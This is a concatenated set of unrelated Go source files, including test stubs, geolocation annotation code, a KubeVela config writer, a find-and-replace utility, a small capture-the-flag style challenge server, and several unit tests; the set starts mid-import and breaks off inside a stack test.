core_xds "github.com/kumahq/kuma/pkg/core/xds"
"github.com/kumahq/kuma/pkg/xds/secrets"
)
// TestSecretsInfo is the canned secrets metadata returned by
// TestSecrets.Info for every dataplane in tests.
var TestSecretsInfo = &secrets.Info{
	Expiration: time.Unix(2, 2),
	Generation: time.Unix(1, 1),
	Tags: map[string]map[string]bool{
		"kuma.io/service": {
			"web": true,
		},
	},
	MTLS: &mesh_proto.Mesh_Mtls{
		EnabledBackend: "ca-1",
		Backends:       nil,
	},
	IssuedBackend:     "ca-1",
	SupportedBackends: []string{"ca-1"},
}
// TestSecrets is a stub secrets.Secrets implementation returning fixed
// certificate material for tests.
type TestSecrets struct {
}
// Get returns fixed identity and CA secrets regardless of the dataplane
// or mesh supplied.
func (t *TestSecrets) Get(*core_mesh.DataplaneResource, *core_mesh.MeshResource) (*core_xds.IdentitySecret, *core_xds.CaSecret, error) {
	identity := &core_xds.IdentitySecret{
		PemCerts: [][]byte{[]byte("CERT")},
		PemKey:   []byte("KEY"),
	}
	ca := &core_xds.CaSecret{
		PemCerts: [][]byte{[]byte("CA")},
	}
	return identity, ca, nil
}
// Info returns the shared canned secrets metadata for any dataplane key.
func (t *TestSecrets) Info(dpKey model.ResourceKey) *secrets.Info {
	return TestSecretsInfo
}

// Cleanup is a no-op in this stub.
func (t *TestSecrets) Cleanup(dpKey model.ResourceKey) {
}

// Compile-time check that TestSecrets implements secrets.Secrets.
var _ secrets.Secrets = &TestSecrets{}
|
package parser
import (
"reflect"
"strconv"
"strings"
"time"
"cloud.google.com/go/bigquery"
"github.com/m-lab/etl/annotation"
"github.com/m-lab/etl/metrics"
"github.com/m-lab/etl/schema"
"github.com/prometheus/client_golang/prometheus"
)
// AddGeoDataSSConnSpec takes a pointer to a
// Web100ConnectionSpecification struct and a timestamp. With these,
// it will fetch the appropriate geo data and add it to the hop struct
// referenced by the pointer.
func AddGeoDataSSConnSpec(spec *schema.Web100ConnectionSpecification, timestamp time.Time) {
	if spec == nil {
		metrics.AnnotationErrorCount.With(prometheus.
			Labels{"source": "SS ConnSpec was nil!!!"}).Inc()
		return
	}
	// Time the response
	timerStart := time.Now()
	defer func(tStart time.Time) {
		metrics.AnnotationTimeSummary.
			With(prometheus.Labels{"test_type": "SS"}).
			Observe(float64(time.Since(tStart).Nanoseconds()))
	}(timerStart)
	// Both endpoints are annotated in one call; the geoSlice entries are
	// filled in place.
	ipSlice := []string{spec.Local_ip, spec.Remote_ip}
	geoSlice := []*annotation.GeolocationIP{&spec.Local_geolocation, &spec.Remote_geolocation}
	annotation.FetchGeoAnnotations(ipSlice, timestamp, geoSlice)
}
// AddGeoDataPTConnSpec takes a pointer to a
// MLabConnectionSpecification struct and a timestamp. With these, it
// will fetch the appropriate geo data and add it to the hop struct
// referenced by the pointer.
func AddGeoDataPTConnSpec(spec *schema.MLabConnectionSpecification, timestamp time.Time) {
	if spec == nil {
		metrics.AnnotationErrorCount.With(prometheus.
			Labels{"source": "PT ConnSpec was nil!!!"}).Inc()
		return
	}
	// Time the response
	timerStart := time.Now()
	defer func(tStart time.Time) {
		metrics.AnnotationTimeSummary.
			With(prometheus.Labels{"test_type": "PT"}).
			Observe(float64(time.Since(tStart).Nanoseconds()))
	}(timerStart)
	// Server and client endpoints are annotated together in one call.
	ipSlice := []string{spec.Server_ip, spec.Client_ip}
	geoSlice := []*annotation.GeolocationIP{&spec.Server_geolocation, &spec.Client_geolocation}
	annotation.FetchGeoAnnotations(ipSlice, timestamp, geoSlice)
}
// AddGeoDataPTHopBatch takes a slice of pointers to
// schema.ParisTracerouteHops and will annotate all of them or fail
// silently. It sends them all in a single remote request.
func AddGeoDataPTHopBatch(hops []*schema.ParisTracerouteHop, timestamp time.Time) {
	// Time the response
	timerStart := time.Now()
	defer func(tStart time.Time) {
		metrics.AnnotationTimeSummary.
			With(prometheus.Labels{"test_type": "PT-HOP Batch"}).
			Observe(float64(time.Since(tStart).Nanoseconds()))
	}(timerStart)
	// Deduplicate the hop IPs, fetch all annotations in one remote call,
	// then fan the results back out onto the hops.
	requestSlice := CreateRequestDataFromPTHops(hops, timestamp)
	annotationData := annotation.GetBatchGeoData(annotation.BatchURL, requestSlice)
	AnnotatePTHops(hops, annotationData, timestamp)
}
// AnnotatePTHops takes a slice of hop pointers, the annotation data
// mapping ip addresses to geo data and a timestamp. It will then use
// these to attach the appropriate geo data to the PT hops.
func AnnotatePTHops(hops []*schema.ParisTracerouteHop, annotationData map[string]annotation.GeoData, timestamp time.Time) {
	if annotationData == nil {
		return
	}
	// Annotation map keys are "<ip><unix-time-base36>", matching the
	// encoding used when requests were built.
	timeString := strconv.FormatInt(timestamp.Unix(), 36)
	for _, hop := range hops {
		if hop == nil {
			continue
		}
		if data, ok := annotationData[hop.Src_ip+timeString]; ok && data.Geo != nil {
			hop.Src_geolocation = *data.Geo
		} else {
			metrics.AnnotationErrorCount.With(prometheus.
				Labels{"source": "Couldn't get geo data for PT Hop!"}).Inc()
		}
		if data, ok := annotationData[hop.Dest_ip+timeString]; ok && data.Geo != nil {
			hop.Dest_geolocation = *data.Geo
		} else {
			metrics.AnnotationErrorCount.With(prometheus.
				Labels{"source": "Couldn't get geo data for PT Hop!"}).Inc()
		}
	}
}
// CreateRequestDataFromPTHops will take a slice of PT hop pointers
// and the associate timestamp. From those, it will create a slice of
// requests to send to the annotation service, removing duplicates
// along the way.
// CreateRequestDataFromPTHops builds the deduplicated request list for
// the batch annotation service from the given hops; nil hops and empty
// IPs are counted in the error metric and skipped.
//
// Fix: the RequestData literals now use keyed fields (matching the rest
// of this file and `go vet`'s composites check); the previously unnamed
// middle field was 0 and is simply omitted, keeping its zero value.
func CreateRequestDataFromPTHops(hops []*schema.ParisTracerouteHop, timestamp time.Time) []annotation.RequestData {
	// Keyed by IP so duplicate addresses collapse into a single request.
	hopMap := map[string]annotation.RequestData{}
	for _, hop := range hops {
		if hop == nil {
			metrics.AnnotationErrorCount.With(prometheus.
				Labels{"source": "PT Hop was nil!!!"}).Inc()
			continue
		}
		if hop.Src_ip != "" {
			hopMap[hop.Src_ip] = annotation.RequestData{IP: hop.Src_ip, Timestamp: timestamp}
		} else {
			metrics.AnnotationErrorCount.With(prometheus.
				Labels{"source": "PT Hop was missing an IP!!!"}).Inc()
		}
		if hop.Dest_ip != "" {
			hopMap[hop.Dest_ip] = annotation.RequestData{IP: hop.Dest_ip, Timestamp: timestamp}
		} else {
			metrics.AnnotationErrorCount.With(prometheus.
				Labels{"source": "PT Hop was missing an IP!!!"}).Inc()
		}
	}
	requestSlice := make([]annotation.RequestData, 0, len(hopMap))
	for _, req := range hopMap {
		requestSlice = append(requestSlice, req)
	}
	return requestSlice
}
// AddGeoDataPTHop takes a pointer to a ParisTracerouteHop and a
// timestamp. With these, it will fetch the appropriate geo data and
// add it to the hop struct referenced by the pointer.
func AddGeoDataPTHop(hop *schema.ParisTracerouteHop, timestamp time.Time) {
	if hop == nil {
		metrics.AnnotationErrorCount.With(prometheus.
			Labels{"source": "PT Hop was nil!!!"}).Inc()
		return
	}
	// Time the response
	timerStart := time.Now()
	defer func(tStart time.Time) {
		metrics.AnnotationTimeSummary.
			With(prometheus.Labels{"test_type": "PT-HOP"}).
			Observe(float64(time.Since(tStart).Nanoseconds()))
	}(timerStart)
	// Src and dest are annotated independently: a missing IP on one side
	// is counted but does not block the other.
	if hop.Src_ip != "" {
		annotation.GetAndInsertGeolocationIPStruct(&hop.Src_geolocation, hop.Src_ip, timestamp)
	} else {
		metrics.AnnotationErrorCount.With(prometheus.
			Labels{"source": "PT Hop had no src_ip!"}).Inc()
	}
	if hop.Dest_ip != "" {
		annotation.GetAndInsertGeolocationIPStruct(&hop.Dest_geolocation, hop.Dest_ip, timestamp)
	} else {
		metrics.AnnotationErrorCount.With(prometheus.
			Labels{"source": "PT Hop had no dest_ip!"}).Inc()
	}
}
// AddGeoDataNDTConnSpec takes a connection spec and a timestamp and
// annotates the connection spec with geo data associated with each IP
// Address. It will either sucessfully add the geo data or fail
// silently and make no changes.
func AddGeoDataNDTConnSpec(spec schema.Web100ValueMap, timestamp time.Time) {
	// Only annotate if flag enabled...
	// TODO(gfr) - should propogate this to other pipelines, or push to a common
	// intercept point.
	if !annotation.IPAnnotationEnabled {
		metrics.AnnotationErrorCount.With(prometheus.Labels{
			"source": "IP Annotation Disabled."}).Inc()
		return
	}
	// Time the response
	timerStart := time.Now()
	defer func(tStart time.Time) {
		metrics.AnnotationTimeSummary.
			With(prometheus.Labels{"test_type": "NDT"}).
			Observe(float64(time.Since(tStart).Nanoseconds()))
	}(timerStart)
	GetAndInsertTwoSidedGeoIntoNDTConnSpec(spec, timestamp)
}
// CopyStructToMap takes a POINTER to an arbitrary struct and copies
// it's fields into a value map. It will also make fields entirely
// lower case, for convienece when working with exported structs. Also,
// NEVER pass in something that is not a pointer to a struct, as this
// will cause a panic.
// CopyStructToMap copies the fields of the struct pointed to by
// sourceStruct into destinationMap, lower-casing each field name.
// Empty strings and zero int64s are skipped. The argument MUST be a
// pointer to a struct or this panics.
func CopyStructToMap(sourceStruct interface{}, destinationMap map[string]bigquery.Value) {
	src := reflect.ValueOf(sourceStruct).Elem()
	srcType := src.Type()
	for i := 0; i < srcType.NumField(); i++ {
		value := src.Field(i).Interface()
		switch typed := value.(type) {
		case string:
			if typed == "" {
				continue
			}
		case int64:
			if typed == 0 {
				continue
			}
		}
		destinationMap[strings.ToLower(srcType.Field(i).Name)] = value
	}
}
// GetAndInsertTwoSidedGeoIntoNDTConnSpec takes a timestamp and an
// NDT connection spec. It will either insert the data into the
// connection spec or silently fail.
func GetAndInsertTwoSidedGeoIntoNDTConnSpec(spec schema.Web100ValueMap, timestamp time.Time) {
	// TODO: Make metrics for sok and cok failures. And double check metrics for cleanliness.
	cip, cok := spec.GetString([]string{"client_ip"})
	sip, sok := spec.GetString([]string{"server_ip"})
	reqData := []annotation.RequestData{}
	if cok {
		reqData = append(reqData, annotation.RequestData{IP: cip, Timestamp: timestamp})
	} else {
		metrics.AnnotationWarningCount.With(prometheus.
			Labels{"source": "Missing client side IP."}).Inc()
	}
	if sok {
		reqData = append(reqData, annotation.RequestData{IP: sip, Timestamp: timestamp})
	} else {
		metrics.AnnotationWarningCount.With(prometheus.
			Labels{"source": "Missing server side IP."}).Inc()
	}
	// Only call the batch service if at least one side has an IP.
	if cok || sok {
		annotationDataMap := annotation.GetBatchGeoData(annotation.BatchURL, reqData)
		// TODO: Revisit decision to use base36 for
		// encoding, rather than base64. (It had to do with
		// library support.)
		// Result keys are "<ip><unix-time-base36>".
		timeString := strconv.FormatInt(timestamp.Unix(), 36)
		if cok {
			if data, ok := annotationDataMap[cip+timeString]; ok && data.Geo != nil {
				CopyStructToMap(data.Geo, spec.Get("client_geolocation"))
			} else {
				metrics.AnnotationErrorCount.With(prometheus.
					Labels{"source": "Couldn't get geo data for the client side."}).Inc()
			}
		}
		if sok {
			if data, ok := annotationDataMap[sip+timeString]; ok && data.Geo != nil {
				CopyStructToMap(data.Geo, spec.Get("server_geolocation"))
			} else {
				metrics.AnnotationErrorCount.With(prometheus.
					Labels{"source": "Couldn't get geo data for the server side."}).Inc()
			}
		}
	}
}
|
/*
Copyright 2022 The KubeVela Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package writer
import (
"context"
"encoding/json"
"fmt"
"reflect"
"strings"
"cuelang.org/go/cue"
"github.com/magiconair/properties"
"github.com/pelletier/go-toml"
"gopkg.in/yaml.v3"
"k8s.io/klog/v2"
"github.com/kubevela/workflow/pkg/cue/model/value"
icontext "github.com/oam-dev/kubevela/pkg/config/context"
"github.com/oam-dev/kubevela/pkg/cue/script"
)
// ExpandedWriterConfig define the supported output ways.
type ExpandedWriterConfig struct {
	// Nacos holds the nacos writer settings; nil disables the nacos writer.
	Nacos *NacosConfig `json:"nacos"`
}

// ExpandedWriterData the data for the expanded writer
type ExpandedWriterData struct {
	// Nacos holds the rendered payload destined for nacos; nil when nacos is not configured.
	Nacos *NacosData `json:"nacos"`
}

// ConfigRef reference a config secret, it must be system scope.
type ConfigRef struct {
	Name      string `json:"name"`
	Namespace string `json:"namespace"`
}
// ParseExpandedWriterConfig parse the expanded writer config from the template value
func ParseExpandedWriterConfig(template cue.Value) ExpandedWriterConfig {
	cfg := ExpandedWriterConfig{}
	if nacosValue := template.LookupPath(cue.ParsePath("nacos")); nacosValue.Exists() {
		nc := &NacosConfig{}
		// A decode failure is only logged; the (possibly partial) config is kept.
		if err := nacosValue.Decode(&nc); err != nil {
			klog.Warningf("failed to decode the nacos config: %s", err.Error())
		}
		cfg.Nacos = nc
	}
	// parse the other writer configs
	return cfg
}
// RenderForExpandedWriter render the configuration for all expanded writers
func RenderForExpandedWriter(ewc ExpandedWriterConfig, template script.CUE, context icontext.ConfigRenderContext, properties map[string]interface{}) (*ExpandedWriterData, error) {
	result := ExpandedWriterData{}
	if ewc.Nacos != nil {
		nacosData, err := renderNacos(ewc.Nacos, template, context, properties)
		if err != nil {
			return nil, err
		}
		result.Nacos = nacosData
		klog.Info("the config render to nacos context successfully")
	}
	return &result, nil
}
// Write write the config by the all writers
func Write(ctx context.Context, ewd *ExpandedWriterData, ri icontext.ReadConfigProvider) (list []error) {
	if ewd.Nacos == nil {
		return nil
	}
	if err := ewd.Nacos.write(ctx, ri); err != nil {
		return append(list, err)
	}
	klog.Info("the config write to the nacos successfully")
	return nil
}
// encodingOutput support the json、toml、xml、properties and yaml formats.
func encodingOutput(input *value.Value, format string) ([]byte, error) {
var data = make(map[string]interface{})
if err := input.UnmarshalTo(&data); err != nil {
return nil, err
}
switch strings.ToLower(format) {
case "json":
return json.Marshal(data)
case "toml":
return toml.Marshal(data)
case "properties":
var kv = map[string]string{}
if err := convertMap2PropertiesKV("", data, kv); err != nil {
return nil, err
}
return []byte(properties.LoadMap(kv).String()), nil
default:
return yaml.Marshal(data)
}
}
// convertMap2PropertiesKV flattens the nested map input into result,
// joining nested keys with "." (prefixed by last when non-empty).
// Scalars become their string form, nested maps recurse, and supported
// slice types are joined with ",". Any other value type yields an error.
func convertMap2PropertiesKV(last string, input map[string]interface{}, result map[string]string) error {
	// toString renders a scalar; nested maps are flattened into result
	// directly and contribute an empty string (so no entry for the map key).
	toString := func(key string, v interface{}, result map[string]string) (string, error) {
		switch value := v.(type) {
		case string:
			return value, nil
		case bool:
			return fmt.Sprintf("%t", value), nil
		case int64, int, int32:
			return fmt.Sprintf("%d", value), nil
		case float64, float32:
			return fmt.Sprintf("%v", value), nil
		case map[string]interface{}:
			if err := convertMap2PropertiesKV(key, value, result); err != nil {
				return "", err
			}
			return "", nil
		default:
			return fmt.Sprintf("%v", value), nil
		}
	}
	for name, raw := range input {
		key := name
		if last != "" {
			key = last + "." + name
		}
		switch typed := raw.(type) {
		case string, bool, int64, int, int32, float32, float64, map[string]interface{}:
			str, err := toString(key, typed, result)
			if err != nil {
				return err
			}
			if str != "" {
				result[key] = str
			}
		case []interface{}, []string, []int64, []float64, []map[string]interface{}:
			items := reflect.ValueOf(typed)
			var parts []string
			for i := 0; i < items.Len(); i++ {
				str, err := toString(fmt.Sprintf("%s.%d", key, i), items.Index(i).Interface(), result)
				if err != nil {
					return err
				}
				if str != "" {
					parts = append(parts, str)
				}
			}
			if len(parts) > 0 {
				result[key] = strings.Join(parts, ",")
			}
		default:
			return fmt.Errorf("the value type of %s(%T) can not be supported", key, typed)
		}
	}
	return nil
}
|
// +build OMIT
package sample
import "encoding/json"
//START OMIT
// LoadStruct decodes a JSON object into a generic map.
// Decoding is best-effort: on malformed input, output stays nil.
func LoadStruct(data []byte) (output map[string]interface{}) {
	_ = json.Unmarshal(data, &output)
	return
}
// LoadArray decodes a JSON array into a generic slice.
// Decoding is best-effort: on malformed input, output stays nil.
func LoadArray(data []byte) (output []interface{}) {
	_ = json.Unmarshal(data, &output)
	return
}
//END OMIT
|
package main
import (
"flag"
"fmt"
"io/ioutil"
"os"
"path/filepath"
"strings"
)
// ReplaceHelper performs a recursive find-and-replace over every file under Root.
type ReplaceHelper struct {
	Root string // root directory to walk
	//FileName string // file name (currently unused)
	OldText string // text to search for
	NewText string // replacement text
}
// DoWrok walks every file under Root and applies the replacement.
// NOTE(review): the name looks like a typo for "DoWork", but it is
// exported and renaming would break callers, so it is kept as-is.
func (h *ReplaceHelper) DoWrok() error {
	return filepath.Walk(h.Root, h.walkCallback)
}
// walkCallback is the filepath.Walk visitor: it reads each regular file,
// replaces every occurrence of OldText with NewText, and rewrites the
// file in place. Directories are skipped.
func (h ReplaceHelper) walkCallback(path string, f os.FileInfo, err error) error {
	if err != nil {
		return err
	}
	if f == nil {
		return nil
	}
	if f.IsDir() {
		//fmt.Println("DIR:",path)
		return nil
	}
	// TODO: filter by file type before rewriting.
	buf, err := ioutil.ReadFile(path)
	if err != nil {
		return err
	}
	content := string(buf)
	newContent := strings.Replace(content, h.OldText, h.NewText, -1)
	// Skip the write when nothing changed.
	if newContent == content {
		return nil
	}
	// The original passed perm 0 (unreadable if a file were created) and
	// discarded the write error; keep the file's own permissions and
	// propagate failures instead of silently dropping them.
	return ioutil.WriteFile(path, []byte(newContent), f.Mode().Perm())
}
// main reads root/old/new from the command line and runs the replacement.
func main() {
	flag.Parse()

	h := ReplaceHelper{
		Root:    flag.Arg(0),
		OldText: flag.Arg(1),
		NewText: flag.Arg(2),
	}
	if err := h.DoWrok(); err != nil {
		fmt.Println("error:", err.Error())
		return
	}
	fmt.Println("done!")
}
|
package spec_iterator
import (
"gx/ipfs/QmNuLxhqRhfimRZeLttPe6Sa44MNwuHAdaFFa9TDuNZUmf/ginkgo/internal/spec"
)
// SerialIterator hands out the given specs one at a time, in order.
type SerialIterator struct {
	specs []*spec.Spec // all specs to iterate over
	index int          // position of the next spec to return
}
// NewSerialIterator builds an iterator positioned at the first spec.
func NewSerialIterator(specs []*spec.Spec) *SerialIterator {
	it := &SerialIterator{}
	it.specs = specs
	it.index = 0
	return it
}
// Next returns the next spec in order, or ErrClosed once exhausted.
func (s *SerialIterator) Next() (*spec.Spec, error) {
	if s.index < len(s.specs) {
		next := s.specs[s.index]
		s.index++
		return next, nil
	}
	return nil, ErrClosed
}
// NumberOfSpecsPriorToIteration returns the total number of specs handed to the iterator.
func (s *SerialIterator) NumberOfSpecsPriorToIteration() int {
	return len(s.specs)
}
// NumberOfSpecsToProcessIfKnown reports the spec count; always known for a serial iterator.
func (s *SerialIterator) NumberOfSpecsToProcessIfKnown() (int, bool) {
	return len(s.specs), true
}
// NumberOfSpecsThatWillBeRunIfKnown counts specs that are neither
// skipped nor pending; always known for a serial iterator.
// (The loop variable is named sp to avoid shadowing the receiver.)
func (s *SerialIterator) NumberOfSpecsThatWillBeRunIfKnown() (int, bool) {
	runnable := 0
	for _, sp := range s.specs {
		if sp.Skipped() || sp.Pending() {
			continue
		}
		runnable++
	}
	return runnable, true
}
|
package prom
import (
"fmt"
"net/http"
"net/http/httptest"
"strings"
"testing"
"time"
"github.com/luuphu25/data-sidecar/util"
)
var (
	// n is the shared scorer stub that records how often it was called.
	n = NullScorer{lastTime: make(map[string]int64)}
	// pc is the client under test, wired to the stub scorer.
	pc = NewClient("", 10, 60, &n)
)
// NullScorer is a test double that counts Add/Score calls instead of scoring.
type NullScorer struct {
	added    int              // number of accepted Add calls
	scored   int              // number of Score calls
	lastTime map[string]int64 // newest timestamp seen per label set
}
// Add accepts the sample only when its timestamp is strictly newer than
// the last one seen for the same label set; returns whether it was kept.
func (n *NullScorer) Add(labels map[string]string, value float64, ts int64) bool {
	key := util.MapSSToS(labels)
	if ts <= n.lastTime[key] {
		return false
	}
	n.added++
	n.lastTime[key] = ts
	return true
}
// Score only counts the invocation; no scoring is performed.
func (n *NullScorer) Score(map[string]string) {
	n.scored++
}
// ScoreData is a no-op stub.
func (n *NullScorer) ScoreData([]util.DataPoint, map[string]string, bool) {
}
// ScoreCollective is a no-op stub.
func (n *NullScorer) ScoreCollective() {
}
// Reset clears the call counters (lastTime is intentionally kept).
func (n *NullScorer) Reset() {
	n.added = 0
	n.scored = 0
}
// TestDecode checks that DecodeRangeQ parses a valid status payload and
// rejects malformed input.
func TestDecode(t *testing.T) {
	inp := []byte(`{"Status":"ok"}`)
	g, err := DecodeRangeQ(inp)
	if (g.Status != "ok") || (err != nil) {
		t.Error(g, err)
	}
	// Malformed input must produce an error. The original logged the nil
	// err here, which yields a useless "Error: <nil>" message on failure.
	g, err = DecodeRangeQ([]byte("basdf"))
	if err == nil {
		t.Error("expected decode error for malformed input, got nil")
	}
}
// TestQueries spot-checks the URL shapes produced by the query builders.
func TestQueries(t *testing.T) {
	g := pc.SeriesQuery()
	if !strings.Contains(g, "/api/v1/series?match[]={ft_target") {
		t.Error(g)
	}
	g = pc.RangeQuery("abcd")
	if !strings.Contains(g, "/api/v1/query_range?query") {
		t.Error(g)
	}
}
// TestSeriesBits exercises the series bookkeeping: the client starts
// empty, one decoded series match inserts one entry, and a decoded
// range result can be inserted without error.
func TestSeriesBits(t *testing.T) {
	x := pc.knownSeries()
	if len(x) > 0 {
		t.Error(x)
	}
	seriesInp := []byte(`{"Status":"ok",
"Data":[{"__name__":"b"}]}`)
	g := DecodeSeriesMatch(seriesInp)
	num := pc.SeriesInsert(g)
	if num != 1 {
		t.Error(num)
	}
	x = pc.knownSeries()
	if len(x) != 1 {
		t.Error(x)
	}
	rangeInp := []byte(`{"Status":"ok",
"Data":{"ResultType":"Range",
"Result":[{"Metric":{"__name__":"b"},
"Values":[[1,2]]}]}}`)
	h, err := DecodeRangeQ(rangeInp)
	if err != nil {
		t.Error(err)
	}
	pc.RangeInsert(h)
}
// TestFetching spins up a fake Prometheus API (query, query_range,
// series endpoints) and drives PullData through several scenarios:
// an empty/unreachable target, a working server, idempotent re-pulls,
// and malformed series payloads.
func TestFetching(t *testing.T) {
	serveMux := http.NewServeMux()
	serveMux.HandleFunc("/api/v1/query", func(w http.ResponseWriter, r *http.Request) {
		inp := `{"Status":"ok",
"Data":{"ResultType":"Range",
"Result":[{"Metric":{"__name__":"b"},
"Values":[[1,2],[2,3]]}]}}`
		fmt.Fprint(w, inp)
	})
	serveMux.HandleFunc("/api/v1/query_range", func(w http.ResponseWriter, r *http.Request) {
		inp := `{"Status":"ok",
"Data":{"ResultType":"Range",
"Result":[{"Metric":{"__name__":"b"},
"Values":[[1,2]]}]}}`
		fmt.Fprint(w, inp)
	})
	series := `{"Status":"ok",
"Data":[{"ResultType":"Range","A":"B"},{"Q":"R"}]}`
	serveMux.HandleFunc("/api/v1/series", func(w http.ResponseWriter, r *http.Request) {
		fmt.Fprint(w, series)
	})
	server := httptest.NewUnstartedServer(serveMux)
	server.Start()
	//reset internal client
	pc.Res = 0
	pc.Start()
	// NOTE(review): this sleeps 1 nanosecond — probably a duration such
	// as time.Second was intended; confirm.
	time.Sleep(1)
	// pull from ""
	pc.client = server.Client()
	pc.client.Timeout = time.Second
	pc.PullData()
	// pull from server.URL
	pc.P8s = server.URL
	n.Reset()
	pc.PullData()
	added := n.added
	scored := n.scored
	// pulling the same data should not add or score
	pc.PullData()
	if n.added != added || n.scored != scored {
		t.Errorf("Expected no more values added or scored. Before: %d, %d, after: %d, %d\n", added, scored, n.added, n.scored)
	}
	// pull from localhost:9090
	temp := pc.P8s
	pc.P8s = "localhost:9090"
	pc.PullData()
	pc.P8s = temp
	pc.Fetch("abcd")
	pc.PullData()
	// Malformed series payload: decode fails, pull should still be safe.
	series = `vb{"Status":"ok","Data":[]}`
	DecodeSeriesMatch([]byte(series))
	pc.PullData()
	series = `{"Status":"ok","Data":[]}`
	DecodeSeriesMatch([]byte(series))
	pc.PullData()
	server.Close()
}
|
package command
import (
"context"
"fmt"
"strings"
"github.com/romantomjak/b2/b2"
)
// listFiles prints the names of files in a bucket, where path has the
// form "bucket[/prefix]". It returns 0 on success and 1 on any error,
// reporting errors through the command UI.
func (c *ListCommand) listFiles(path string) int {
	// Split "bucket/prefix" into the bucket name and an optional prefix.
	pathParts := strings.SplitN(path, "/", 2)
	bucketName := pathParts[0]
	filePrefix := ""
	if len(pathParts) > 1 {
		filePrefix = pathParts[1]
	}
	bucket, err := c.findBucketByName(bucketName)
	if err != nil {
		c.ui.Error(fmt.Sprintf("Error: %v", err))
		return 1
	}
	client, err := c.Client()
	if err != nil {
		c.ui.Error(fmt.Sprintf("Error: %v", err))
		return 1
	}
	// "/" as delimiter lists one directory level at a time.
	req := &b2.FileListRequest{
		BucketID:  bucket.ID,
		Prefix:    filePrefix,
		Delimiter: "/",
	}
	ctx := context.TODO()
	files, _, err := client.File.List(ctx, req)
	if err != nil {
		c.ui.Error(fmt.Sprintf("Error: %v", err))
		return 1
	}
	for _, file := range files {
		c.ui.Output(file.FileName)
	}
	return 0
}
// findBucketByName resolves a bucket by its exact name. It returns an
// error when the client cannot be created, the listing fails, or no
// bucket with that name exists.
func (c *ListCommand) findBucketByName(name string) (*b2.Bucket, error) {
	client, err := c.Client()
	if err != nil {
		// Return the error without printing it here: the caller already
		// reports returned errors to the UI, and the previous
		// c.ui.Error call made the same message appear twice.
		return nil, err
	}
	req := &b2.BucketListRequest{
		AccountID: client.Session.AccountID,
		Name:      name,
	}
	ctx := context.TODO()
	buckets, _, err := client.Bucket.List(ctx, req)
	if err != nil {
		return nil, err
	}
	if len(buckets) == 0 {
		return nil, fmt.Errorf("bucket with name %q was not found", name)
	}
	return &buckets[0], nil
}
|
package main
import (
"fmt"
"io/ioutil"
"net/http"
"strconv"
)
var (
	// clients counts requests per remote address as a naive brute-force
	// limiter. NOTE(review): RemoteAddr includes the ephemeral client
	// port, so each new connection gets a fresh counter — confirm intent.
	clients = make(map[string]int)
)
// input serves the static "input" file from the working directory.
func input(w http.ResponseWriter, r *http.Request) {
	http.ServeFile(w, r, "input")
}
// home serves the challenge: without the "inter" form value it shows the
// instructions; with the magic value 209 it returns the flag file, and
// otherwise a decoy base64 string. Requests per remote address are
// capped at 20.
func home(w http.ResponseWriter, r *http.Request) {
	inter := r.PostFormValue("inter")
	if inter == "" {
		http.ServeFile(w, r, "./instruction.html")
		return
	}
	// anti bruteforce
	clients[r.RemoteAddr] = clients[r.RemoteAddr] + 1
	if clients[r.RemoteAddr] > 20 {
		http.Error(w, http.StatusText(http.StatusBadRequest), http.StatusBadRequest)
		return
	}
	// handling conversion; a parse failure leaves n == 0 (best effort).
	n, _ := strconv.Atoi(inter)
	if n == 209 {
		data, _ := ioutil.ReadFile("flag")
		// Fprint, not Fprintf: the file content is data, not a format
		// string — the old code would mangle any '%' in the flag
		// (go vet "printf" finding).
		fmt.Fprint(w, string(data))
		return
	}
	fmt.Fprint(w, "ZmxhZ3tUcnlfSGFyZGVyIX0K")
}
// main registers the handlers and serves on :8005.
func main() {
	http.HandleFunc("/", home)
	http.HandleFunc("/input", input)
	fmt.Println("Server is up and running!")
	// Report the listen error instead of exiting silently (the previous
	// code discarded ListenAndServe's return value).
	if err := http.ListenAndServe(":8005", nil); err != nil {
		fmt.Println("server error:", err)
	}
}
|
package bitbucket
import (
"testing"
)
// Test_Keys creates a dummy SSH key, looks it up, lists the user's keys
// and cleans up afterwards.
func Test_Keys(t *testing.T) {
	// Test Public key that we'll add to the account
	public := "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCkRHDtJljvvZudiXxLt+JoHEQ4olLX6vZrVkm4gRVZEC7llKs9lXubHAwzIm+odIWZnoqNKjh0tSQYd5UAlSsrzn9YVvp0Lc2eJo0N1AWuyMzb9na+lfhT/YdM3Htkm14v7OZNdX4fqff/gCuLBIv9Bc9XH0jfEliOmfaDMQsbzcDi4usRoXBrJQQiu6M0A9FF0ruBdpKp0q08XSteGh5cMn1LvOS+vLrkHXi3bOXWvv7YXoVoI5OTUQGJjxmEehRssYiMfwD58cv7v2+PMLR3atGVCnoxxu/zMkXQlBKmEyN9VS7Cr8WOoZcNsCd9C6CCrbP5HZnjiE8F0R9d1zjP test@localhost"
	title := "test@localhost"
	// create a new public key
	key, err := client.Keys.Create(testUser, public, title)
	if err != nil {
		t.Error(err)
		return
	}
	// cleanup after ourselves & delete this dummy key
	defer client.Keys.Delete(testUser, key.Id)
	// Get the new key we recently created
	find, err := client.Keys.Find(testUser, key.Id)
	if err != nil {
		// Previously this error was never checked, so a failed lookup
		// would dereference a zero/nil result below.
		t.Error(err)
		return
	}
	if title != find.Label {
		t.Errorf("key label [%v]; want [%v]", find.Label, title)
	}
	// Get a list of SSH keys for the user
	keys, err := client.Keys.List(testUser)
	if err != nil {
		t.Error(err)
	}
	if len(keys) == 0 {
		t.Errorf("List of keys returned empty set")
	}
}
|
package day18
import (
"testing"
"github.com/achakravarty/30daysofgo/assert"
)
// TestStacks groups the stack subtests.
func TestStacks(t *testing.T) {
	t.Run("Stack Push", testPush)
	t.Run("Stack Pop", testPop)
	// t.Run("De Queue", testDeQueue)
}
// testPush verifies the length grows by one per Push.
func testPush(t *testing.T) {
	stack := Stack{}.NewStack()
	assert.Equal(t, 0, stack.Len())
	stack.Push(1)
	assert.Equal(t, 1, stack.Len())
	stack.Push(2)
	assert.Equal(t, 2, stack.Len())
}
// testPop verifies LIFO order and that popping an empty stack yields the
// zero value (rune(0)).
func testPop(t *testing.T) {
	stack := Stack{}.NewStack()
	stack.Push(1)
	stack.Push(2)
	assert.Equal(t, 2, stack.Len())
	num := stack.Pop()
	assert.Equal(t, rune(2), num)
	num = stack.Pop()
